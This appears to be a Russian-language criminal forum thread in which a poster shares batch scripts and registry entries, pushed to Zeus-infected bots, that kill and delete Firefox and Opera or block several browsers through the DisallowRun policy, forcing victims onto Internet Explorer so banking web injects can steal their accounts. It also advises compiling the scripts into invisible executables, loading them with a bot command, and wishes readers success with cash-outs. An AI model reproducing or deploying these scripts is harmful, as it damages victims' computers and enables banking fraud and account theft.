Кесарю - кесарево, или то как побеждали фаерфокс

[digix]

Собственно возникла такая проблема после появления граббера под фф - стали всплывать весьма нужные мне акки но сделать я с ними ничего не мог потому что инжекты, зевс и фаерфокс к сожалению все еще не друзья. Истекая слюной над нужными акками я начал искать решение. Очевидное было грохнуть лису к такой то бабушке и заставить холдера юзать ослика.

Полистав соседние ресурсы хочу скомпилировать так сказать наработки на эту тему хотя самой правильной идеей которая возникла у меня - была переход с зевса на что то что нормально в лису инжектит.

Ну это все лирика, приступим:

1. метод полного инфаркта

создаем подобный bat файл и грузим его ботам

taskkill /im opera.exe /f
taskkill /im firefox.exe /f
del "%programfiles%\opera\opera.exe" /q /f
del "%programfiles%\Mozilla Firefox\firefox.exe" /q /f

побочные эффекты:
у бота выскакивает окно
у холдера выскакивает инфаркт
и в акк он пойдет не скоро
попутно по пути в реанимацию он успевает просканить себя антивирусом и написать на вас 1001 абузу

2. метод метод безинфарктный кривоватый
представляет из себя метод 1 НО:
мы качаем модную софтинку
http://www.f2ko.de/English/b2e/download.php
конвертируем файл в ехе, выбрав чтоб приложение было невидимо и грузим его ботам после чего радуемся))

2. метод окончательный

вспоминаем про виндовый реестр и создаем bat фал вида:

@echo off
taskkill /im opera.exe /f
taskkill /im firefox.exe /f
taskkill /im chrome.exe /f
taskkill /im safari.exe /f
set key=HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
REG ADD %KEY% /V DisallowRun /T REG_DWORD /D 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /V 1 /D opera.exe /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /V 2 /D firefox.exe /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /V 3 /D chrome.exe /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /V 4 /D safari.exe /f

после чего компилим его в ехе и прогружаем нужным ботам. теперь у среднестатистического есть 2 выхода - или заходить с осла или переставлять винду. остается только надеяться что он выберет первый метод.
о том что подгружать ботам нужно командой rexeci http://... я думаю все помнят)

успешных всем заливов и скорейших обналов.

digix, специально для vip раздела CI

 

[digix]

Вот еще к данному посту в догонку копипаст с эксплойта

Сделал 4 проги, автоматически и скрыто добавляют записи в реестр!

1. BlockAll - блочит все браузеры.. Для зевса мало пользы, но это можно после того, как жертва станет бесполезной biggrin.gif
2. FF&IE - блочит все браузеры, кроме FF и IE
3. FFOnly - блочит все браузеры, кроме FF
4. IEOnly - блочит все браузеры, кроме IE

Качаем, все в одном архиве!

Работает по

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"DisallowRun"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\DisallowRun]
"1"="opera.exe"
"2"="firefox.exe"
"3"="chrome.exe"
"4"="safari.exe"

Но скрыто и в формате exe.. [Жертве не надо соглашаться с внесением инфы в реестр, она вносится автоматически]

(c) не мое

 

[ob00m]

пригодится. пасиба

 

[timonsyz]

ооооо! воообще круто!

 

[timonsyz]

Качаем, все в одном архиве!

диг обнови плиз линки...